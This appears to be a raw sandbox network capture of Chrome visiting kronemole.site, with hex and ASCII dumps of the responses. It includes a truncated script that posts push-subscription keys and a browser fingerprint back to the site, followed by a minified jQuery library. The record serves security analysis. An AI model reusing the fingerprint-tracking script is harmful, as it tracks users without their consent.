                                                                          2023-11-21 16:58:40 UTC257INData Raw: 36 35 36 0d 0a 66 75 6e 63 74 69 6f 6e 20 70 75 73 68 43 6f 75 6e 74 28 70 73 68 70 61 72 61 6d 73 2c 70 73 68 70 75 62 2c 70 73 68 66 69 6e 67 65 72 70 72 69 6e 74 29 7b 0a 09 0a 09 76 61 72 20 78 68 72 20 3d 20 6e 65 77 20 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 28 29 3b 0a 09 78 68 72 2e 6f 70 65 6e 28 27 50 4f 53 54 27 2c 20 27 27 29 3b 0a 09 78 68 72 2e 73 65 74 52 65 71 75 65 73 74 48 65 61 64 65 72 28 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 2c 20 27 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 77 77 77 2d 66 6f 72 6d 2d 75 72 6c 65 6e 63 6f 64 65 64 27 29 3b 0a 09 78 68 72 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 09 09 69 66 20 28 78 68 72 2e 73 74 61 74 75 73 20 3d 3d 3d 20 32 30 30 29 20 7b 0a 09 09 09 76 61 72 20 72
                                                                          Data Ascii: 656function pushCount(pshparams,pshpub,pshfingerprint){var xhr = new XMLHttpRequest();xhr.open('POST', '');xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');xhr.onload = function() {if (xhr.status === 200) {var r
                                                                          2023-11-21 16:58:40 UTC257INData Raw: 2b 20 70 73 68 70 75 62 20 2b 20 27 26 66 70 3d 27 20 2b 20 70 73 68 66 69 6e 67 65 72 70 72 69 6e 74 3b 0a 09 78 68 72 2e 73 65 6e 64 28 64 61 74 61 29 3b 0a 7d 0a 0a 0a 0a 76 61 72 20 4d 59 43 41 4c 4c 20 3d 20 4d 59 43 41 4c 4c 20 7c 7c 20 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 20 20 20 20 76 61 72 20 70 73 68 70 61 72 61 6d 73 20 3d 20 7b 7d 3b 20 2f 2f 20 70 72 69 76 61 74 65 0a 20 20 20 20 72 65 74 75 72 6e 20 7b 0a 20 20 20 20 20 20 20 20 69 6e 69 74 20 3a 20 66 75 6e 63 74 69 6f 6e 28 41 72 67 73 29 20 7b 0a 20 20 20 20 09 20 20 20 20 2f 2f 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 41 72 67 73 5b 32 5d 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 73 68 70 61 72 61 6d 73 20 3d 20 41 72 67 73 5b 30 5d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 73 68
                                                                          Data Ascii: + pshpub + '&fp=' + pshfingerprint;xhr.send(data);}var MYCALL = MYCALL || (function(){ var pshparams = {}; // private return { init : function(Args) { //console.log(Args[2]); pshparams = Args[0]; psh
                                                                          2023-11-21 16:58:40 UTC258INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          11192.168.2.449749104.21.62.2034435352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          2023-11-21 16:58:40 UTC78OUTGET /assets/js/vendor/jquery-3.4.1.min.js HTTP/1.1
                                                                          Host: kronemole.site
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://kronemole.site/00751fdff8a0f3cf22b7cf59c24e5f09
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: PHPSESSID=03a2656556074e0f77a0ceaf7389c11a
                                                                          2023-11-21 16:58:40 UTC197INHTTP/1.1 200 OK
                                                                          Date: Tue, 21 Nov 2023 16:58:40 GMT
                                                                          Content-Type: application/javascript
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800
                                                                          expires: Tue, 28 Nov 2023 16:47:59 GMT
                                                                          last-modified: Tue, 23 Mar 2021 22:52:06 GMT
                                                                          vary: Accept-Encoding,User-Agent,User-Agent
                                                                          x-frame-options: SAMEORIGIN
                                                                          x-xss-protection: 1; mode=block
                                                                          x-content-type-options: nosniff
                                                                          CF-Cache-Status: HIT
                                                                          Age: 641
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CMueGu%2Btmsu6jcmQG3PxgnW1ND7sijbbQCkeauAP8pUgcDIzye3IOAhdH7CCruMDVDADeQ6WuWZdAvXl2vZqdyjpMHrWLyqceMc7tXi4KUBN3%2B6N%2FtewMdJX0Hzi%2BASCFw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 829a7a923a88829e-IAD
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2023-11-21 16:58:40 UTC198INData Raw: 37 63 35 66 0d 0a 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 34 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a
                                                                          Data Ascii: 7c5f/*! jQuery v3.4.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("j
                                                                          2023-11-21 16:58:40 UTC199INData Raw: 61 2e 63 61 6c 6c 28 4f 62 6a 65 63 74 29 2c 79 3d 7b 7d 2c 6d 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 6e 75 6d 62 65 72 22 21 3d 74 79 70 65 6f 66 20 65 2e 6e 6f 64 65 54 79 70 65 7d 2c 78 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 65 26 26 65 3d 3d 3d 65 2e 77 69 6e 64 6f 77 7d 2c 63 3d 7b 74 79 70 65 3a 21 30 2c 73 72 63 3a 21 30 2c 6e 6f 6e 63 65 3a 21 30 2c 6e 6f 4d 6f 64 75 6c 65 3a 21 30 7d 3b 66 75 6e 63 74 69 6f 6e 20 62 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 28 6e 3d 6e 7c 7c 45 29 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 69 66 28 6f 2e 74 65 78 74 3d 65 2c 74 29 66 6f 72 28 72
                                                                          Data Ascii: a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r
                                                                          2023-11-21 16:58:40 UTC200INData Raw: 74 72 75 63 74 6f 72 28 29 7d 2c 70 75 73 68 3a 75 2c 73 6f 72 74 3a 74 2e 73 6f 72 74 2c 73 70 6c 69 63 65 3a 74 2e 73 70 6c 69 63 65 7d 2c 6b 2e 65 78 74 65 6e 64 3d 6b 2e 66 6e 2e 65 78 74 65 6e 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 2c 74 2c 6e 2c 72 2c 69 2c 6f 2c 61 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 7c 7c 7b 7d 2c 73 3d 31 2c 75 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2c 6c 3d 21 31 3b 66 6f 72 28 22 62 6f 6f 6c 65 61 6e 22 3d 3d 74 79 70 65 6f 66 20 61 26 26 28 6c 3d 61 2c 61 3d 61 72 67 75 6d 65 6e 74 73 5b 73 5d 7c 7c 7b 7d 2c 73 2b 2b 29 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 61 7c 7c 6d 28 61 29 7c 7c 28 61 3d 7b 7d 29 2c 73 3d 3d 3d 75 26 26 28 61 3d 74 68 69 73 2c 73 2d 2d 29 3b 73 3c 75 3b 73 2b
                                                                          Data Ascii: tructor()},push:u,sort:t.sort,splice:t.splice},k.extend=k.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for("boolean"==typeof a&&(l=a,a=arguments[s]||{},s++),"object"==typeof a||m(a)||(a={}),s===u&&(a=this,s--);s<u;s+
                                                                          2023-11-21 16:58:40 UTC201INData Raw: 74 75 72 6e 20 65 2e 6c 65 6e 67 74 68 3d 69 2c 65 7d 2c 67 72 65 70 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 66 6f 72 28 76 61 72 20 72 3d 5b 5d 2c 69 3d 30 2c 6f 3d 65 2e 6c 65 6e 67 74 68 2c 61 3d 21 6e 3b 69 3c 6f 3b 69 2b 2b 29 21 74 28 65 5b 69 5d 2c 69 29 21 3d 3d 61 26 26 72 2e 70 75 73 68 28 65 5b 69 5d 29 3b 72 65 74 75 72 6e 20 72 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 30 2c 61 3d 5b 5d 3b 69 66 28 64 28 65 29 29 66 6f 72 28 72 3d 65 2e 6c 65 6e 67 74 68 3b 6f 3c 72 3b 6f 2b 2b 29 6e 75 6c 6c 21 3d 28 69 3d 74 28 65 5b 6f 5d 2c 6f 2c 6e 29 29 26 26 61 2e 70 75 73 68 28 69 29 3b 65 6c 73 65 20 66 6f 72 28 6f 20 69 6e 20 65 29 6e 75 6c 6c 21 3d 28 69 3d 74 28 65 5b 6f 5d 2c 6f 2c
                                                                          Data Ascii: turn e.length=i,e},grep:function(e,t,n){for(var r=[],i=0,o=e.length,a=!n;i<o;i++)!t(e[i],i)!==a&&r.push(e[i]);return r},map:function(e,t,n){var r,i,o=0,a=[];if(d(e))for(r=e.length;o<r;o++)null!=(i=t(e[o],o,n))&&a.push(i);else for(o in e)null!=(i=t(e[o],o,
                                                                          2023-11-21 16:58:40 UTC203INData Raw: 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 4d 2b 22 2a 28 5b 3e 2b 7e 5d 7c 22 2b 4d 2b 22 29 22 2b 4d 2b 22 2a 22 29 2c 55 3d 6e 65 77 20 52 65 67 45 78 70 28 4d 2b 22 7c 3e 22 29 2c 58 3d 6e 65 77 20 52 65 67 45 78 70 28 24 29 2c 56 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 49 2b 22 24 22 29 2c 47 3d 7b 49 44 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 23 28 22 2b 49 2b 22 29 22 29 2c 43 4c 41 53 53 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 5c 5c 2e 28 22 2b 49 2b 22 29 22 29 2c 54 41 47 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 28 22 2b 49 2b 22 7c 5b 2a 5d 29 22 29 2c 41 54 54 52 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 57 29 2c 50 53 45 55 44 4f 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 24 29 2c 43 48 49 4c 44 3a 6e 65 77 20 52
                                                                          Data Ascii: =new RegExp("^"+M+"*([>+~]|"+M+")"+M+"*"),U=new RegExp(M+"|>"),X=new RegExp($),V=new RegExp("^"+I+"$"),G={ID:new RegExp("^#("+I+")"),CLASS:new RegExp("^\\.("+I+")"),TAG:new RegExp("^("+I+"|[*])"),ATTR:new RegExp("^"+W),PSEUDO:new RegExp("^"+$),CHILD:new R
                                                                          2023-11-21 16:58:40 UTC204INData Raw: 30 3b 77 68 69 6c 65 28 65 5b 6e 2b 2b 5d 3d 74 5b 72 2b 2b 5d 29 3b 65 2e 6c 65 6e 67 74 68 3d 6e 2d 31 7d 7d 7d 66 75 6e 63 74 69 6f 6e 20 73 65 28 74 2c 65 2c 6e 2c 72 29 7b 76 61 72 20 69 2c 6f 2c 61 2c 73 2c 75 2c 6c 2c 63 2c 66 3d 65 26 26 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2c 70 3d 65 3f 65 2e 6e 6f 64 65 54 79 70 65 3a 39 3b 69 66 28 6e 3d 6e 7c 7c 5b 5d 2c 22 73 74 72 69 6e 67 22 21 3d 74 79 70 65 6f 66 20 74 7c 7c 21 74 7c 7c 31 21 3d 3d 70 26 26 39 21 3d 3d 70 26 26 31 31 21 3d 3d 70 29 72 65 74 75 72 6e 20 6e 3b 69 66 28 21 72 26 26 28 28 65 3f 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 3a 6d 29 21 3d 3d 43 26 26 54 28 65 29 2c 65 3d 65 7c 7c 43 2c 45 29 29 7b 69 66 28 31 31 21 3d 3d 70 26 26 28 75 3d 5a 2e 65 78 65 63 28
                                                                          Data Ascii: 0;while(e[n++]=t[r++]);e.length=n-1}}}function se(t,e,n,r){var i,o,a,s,u,l,c,f=e&&e.ownerDocument,p=e?e.nodeType:9;if(n=n||[],"string"!=typeof t||!t||1!==p&&9!==p&&11!==p)return n;if(!r&&((e?e.ownerDocument||e:m)!==C&&T(e),e=e||C,E)){if(11!==p&&(u=Z.exec(
                                                                          2023-11-21 16:58:40 UTC205INData Raw: 5b 6e 5b 72 5d 5d 3d 74 7d 66 75 6e 63 74 69 6f 6e 20 70 65 28 65 2c 74 29 7b 76 61 72 20 6e 3d 74 26 26 65 2c 72 3d 6e 26 26 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 26 26 31 3d 3d 3d 74 2e 6e 6f 64 65 54 79 70 65 26 26 65 2e 73 6f 75 72 63 65 49 6e 64 65 78 2d 74 2e 73 6f 75 72 63 65 49 6e 64 65 78 3b 69 66 28 72 29 72 65 74 75 72 6e 20 72 3b 69 66 28 6e 29 77 68 69 6c 65 28 6e 3d 6e 2e 6e 65 78 74 53 69 62 6c 69 6e 67 29 69 66 28 6e 3d 3d 3d 74 29 72 65 74 75 72 6e 2d 31 3b 72 65 74 75 72 6e 20 65 3f 31 3a 2d 31 7d 66 75 6e 63 74 69 6f 6e 20 64 65 28 74 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 22 69 6e 70 75 74 22 3d 3d 3d 65 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 26 26 65 2e 74 79
                                                                          Data Ascii: [n[r]]=t}function pe(e,t){var n=t&&e,r=n&&1===e.nodeType&&1===t.nodeType&&e.sourceIndex-t.sourceIndex;if(r)return r;if(n)while(n=n.nextSibling)if(n===t)return-1;return e?1:-1}function de(t){return function(e){return"input"===e.nodeName.toLowerCase()&&e.ty
                                                                          2023-11-21 16:58:40 UTC207INData Raw: 61 67 4e 61 6d 65 3d 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 43 2e 63 72 65 61 74 65 43 6f 6d 6d 65 6e 74 28 22 22 29 29 2c 21 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 2a 22 29 2e 6c 65 6e 67 74 68 7d 29 2c 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 3d 4b 2e 74 65 73 74 28 43 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 29 2c 64 2e 67 65 74 42 79 49 64 3d 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 61 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 65 29 2e 69 64 3d 6b 2c 21 43 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 4e 61 6d 65 7c 7c 21 43 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 4e 61 6d
                                                                          Data Ascii: agName=ce(function(e){return e.appendChild(C.createComment("")),!e.getElementsByTagName("*").length}),d.getElementsByClassName=K.test(C.getElementsByClassName),d.getById=ce(function(e){return a.appendChild(e).id=k,!C.getElementsByName||!C.getElementsByNam
                                                                          2023-11-21 16:58:40 UTC208INData Raw: 73 61 3d 4b 2e 74 65 73 74 28 43 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 29 29 26 26 28 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 61 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 65 29 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 69 64 3d 27 22 2b 6b 2b 22 27 3e 3c 2f 61 3e 3c 73 65 6c 65 63 74 20 69 64 3d 27 22 2b 6b 2b 22 2d 5c 72 5c 5c 27 20 6d 73 61 6c 6c 6f 77 63 61 70 74 75 72 65 3d 27 27 3e 3c 6f 70 74 69 6f 6e 20 73 65 6c 65 63 74 65 64 3d 27 27 3e 3c 2f 6f 70 74 69 6f 6e 3e 3c 2f 73 65 6c 65 63 74 3e 22 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 6d 73 61 6c 6c 6f 77 63 61 70 74 75 72 65 5e 3d 27 27 5d 22 29 2e 6c 65 6e 67 74 68 26 26 76 2e 70 75 73 68 28 22 5b 2a 5e 24 5d 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22
                                                                          Data Ascii: sa=K.test(C.querySelectorAll))&&(ce(function(e){a.appendChild(e).innerHTML="<a id='"+k+"'></a><select id='"+k+"-\r\\' msallowcapture=''><option selected=''></option></select>",e.querySelectorAll("[msallowcapture^='']").length&&v.push("[*^$]="+M+"*(?:''|\"
                                                                          2023-11-21 16:58:40 UTC209INData Raw: 3f 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 3f 65 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 3a 65 2c 72 3d 74 26 26 74 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 72 65 74 75 72 6e 20 65 3d 3d 3d 72 7c 7c 21 28 21 72 7c 7c 31 21 3d 3d 72 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 28 6e 2e 63 6f 6e 74 61 69 6e 73 3f 6e 2e 63 6f 6e 74 61 69 6e 73 28 72 29 3a 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 26 26 31 36 26 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 72 29 29 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 74 29 77 68 69 6c 65 28 74 3d 74 2e 70 61 72 65 6e 74 4e 6f 64 65 29 69 66 28 74 3d 3d 3d 65 29 72 65 74 75 72 6e 21
                                                                          Data Ascii: ?function(e,t){var n=9===e.nodeType?e.documentElement:e,r=t&&t.parentNode;return e===r||!(!r||1!==r.nodeType||!(n.contains?n.contains(r):e.compareDocumentPosition&&16&e.compareDocumentPosition(r)))}:function(e,t){if(t)while(t=t.parentNode)if(t===e)return!
                                                                          2023-11-21 16:58:40 UTC211INData Raw: 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 21 3d 3d 43 26 26 54 28 65 29 3b 76 61 72 20 6e 3d 62 2e 61 74 74 72 48 61 6e 64 6c 65 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 2c 72 3d 6e 26 26 6a 2e 63 61 6c 6c 28 62 2e 61 74 74 72 48 61 6e 64 6c 65 2c 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 3f 6e 28 65 2c 74 2c 21 45 29 3a 76 6f 69 64 20 30 3b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 21 3d 3d 72 3f 72 3a 64 2e 61 74 74 72 69 62 75 74 65 73 7c 7c 21 45 3f 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 74 29 3a 28 72 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 74 29 29 26 26 72 2e 73 70 65 63 69 66 69 65 64 3f 72 2e 76 61 6c 75 65 3a 6e 75 6c 6c 7d 2c 73 65 2e 65 73 63 61 70 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74
                                                                          Data Ascii: wnerDocument||e)!==C&&T(e);var n=b.attrHandle[t.toLowerCase()],r=n&&j.call(b.attrHandle,t.toLowerCase())?n(e,t,!E):void 0;return void 0!==r?r:d.attributes||!E?e.getAttribute(t):(r=e.getAttributeNode(t))&&r.specified?r.value:null},se.escape=function(e){ret
                                                                          2023-11-21 16:58:40 UTC212INData Raw: 33 5d 26 26 73 65 2e 65 72 72 6f 72 28 65 5b 30 5d 29 2c 65 7d 2c 50 53 45 55 44 4f 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3d 21 65 5b 36 5d 26 26 65 5b 32 5d 3b 72 65 74 75 72 6e 20 47 2e 43 48 49 4c 44 2e 74 65 73 74 28 65 5b 30 5d 29 3f 6e 75 6c 6c 3a 28 65 5b 33 5d 3f 65 5b 32 5d 3d 65 5b 34 5d 7c 7c 65 5b 35 5d 7c 7c 22 22 3a 6e 26 26 58 2e 74 65 73 74 28 6e 29 26 26 28 74 3d 68 28 6e 2c 21 30 29 29 26 26 28 74 3d 6e 2e 69 6e 64 65 78 4f 66 28 22 29 22 2c 6e 2e 6c 65 6e 67 74 68 2d 74 29 2d 6e 2e 6c 65 6e 67 74 68 29 26 26 28 65 5b 30 5d 3d 65 5b 30 5d 2e 73 6c 69 63 65 28 30 2c 74 29 2c 65 5b 32 5d 3d 6e 2e 73 6c 69 63 65 28 30 2c 74 29 29 2c 65 2e 73 6c 69 63 65 28 30 2c 33 29 29 7d 7d 2c 66 69 6c 74 65 72 3a 7b 54 41 47 3a 66
                                                                          Data Ascii: 3]&&se.error(e[0]),e},PSEUDO:function(e){var t,n=!e[6]&&e[2];return G.CHILD.test(e[0])?null:(e[3]?e[2]=e[4]||e[5]||"":n&&X.test(n)&&(t=h(n,!0))&&(t=n.indexOf(")",n.length-t)-n.length)&&(e[0]=e[0].slice(0,t),e[2]=n.slice(0,t)),e.slice(0,3))}},filter:{TAG:f
                                                                          2023-11-21 16:58:40 UTC213INData Raw: 2e 66 69 72 73 74 43 68 69 6c 64 3a 63 2e 6c 61 73 74 43 68 69 6c 64 5d 2c 6d 26 26 70 29 7b 64 3d 28 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 63 29 5b 6b 5d 7c 7c 28 61 5b 6b 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 53 26 26 72 5b 31 5d 29 26 26 72 5b 32 5d 2c 61 3d 73 26 26 63 2e 63 68 69 6c 64 4e 6f 64 65 73 5b 73 5d 3b 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 26 26 2b 2b 64 26 26 61 3d 3d 3d 65 29 7b 69 5b 68 5d 3d 5b 53 2c 73 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28
                                                                          Data Ascii: .firstChild:c.lastChild],m&&p){d=(s=(r=(i=(o=(a=c)[k]||(a[k]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===S&&r[1])&&r[2],a=s&&c.childNodes[s];while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if(1===a.nodeType&&++d&&a===e){i[h]=[S,s,d];break}}else if(p&&(d=s=(
                                                                          2023-11-21 16:58:40 UTC215INData Raw: 65 28 74 65 2c 6e 65 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 64 6f 7b 69 66 28 74 3d 45 3f 65 2e 6c 61 6e 67 3a 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 78 6d 6c 3a 6c 61 6e 67 22 29 7c 7c 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 6c 61 6e 67 22 29 29 72 65 74 75 72 6e 28 74 3d 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 3d 3d 3d 6e 7c 7c 30 3d 3d 3d 74 2e 69 6e 64 65 78 4f 66 28 6e 2b 22 2d 22 29 7d 77 68 69 6c 65 28 28 65 3d 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 26 26 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 29 3b 72 65 74 75 72 6e 21 31 7d 7d 29 2c 74 61 72 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 6e 2e 6c 6f 63 61 74 69 6f 6e 26 26 6e 2e 6c 6f 63
                                                                          Data Ascii: e(te,ne).toLowerCase(),function(e){var t;do{if(t=E?e.lang:e.getAttribute("xml:lang")||e.getAttribute("lang"))return(t=t.toLowerCase())===n||0===t.indexOf(n+"-")}while((e=e.parentNode)&&1===e.nodeType);return!1}}),target:function(e){var t=n.location&&n.loc
                                                                          2023-11-21 16:58:40 UTC216INData Raw: 7d 29 2c 6c 74 3a 76 65 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 66 6f 72 28 76 61 72 20 72 3d 6e 3c 30 3f 6e 2b 74 3a 74 3c 6e 3f 74 3a 6e 3b 30 3c 3d 2d 2d 72 3b 29 65 2e 70 75 73 68 28 72 29 3b 72 65 74 75 72 6e 20 65 7d 29 2c 67 74 3a 76 65 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 66 6f 72 28 76 61 72 20 72 3d 6e 3c 30 3f 6e 2b 74 3a 6e 3b 2b 2b 72 3c 74 3b 29 65 2e 70 75 73 68 28 72 29 3b 72 65 74 75 72 6e 20 65 7d 29 7d 7d 29 2e 70 73 65 75 64 6f 73 2e 6e 74 68 3d 62 2e 70 73 65 75 64 6f 73 2e 65 71 2c 7b 72 61 64 69 6f 3a 21 30 2c 63 68 65 63 6b 62 6f 78 3a 21 30 2c 66 69 6c 65 3a 21 30 2c 70 61 73 73 77 6f 72 64 3a 21 30 2c 69 6d 61 67 65 3a 21 30 7d 29 62 2e 70 73 65 75 64 6f 73 5b 65 5d 3d 64 65 28 65 29 3b 66 6f 72 28 65 20
                                                                          Data Ascii: }),lt:ve(function(e,t,n){for(var r=n<0?n+t:t<n?t:n;0<=--r;)e.push(r);return e}),gt:ve(function(e,t,n){for(var r=n<0?n+t:n;++r<t;)e.push(r);return e})}}).pseudos.nth=b.pseudos.eq,{radio:!0,checkbox:!0,file:!0,password:!0,image:!0})b.pseudos[e]=de(e);for(e
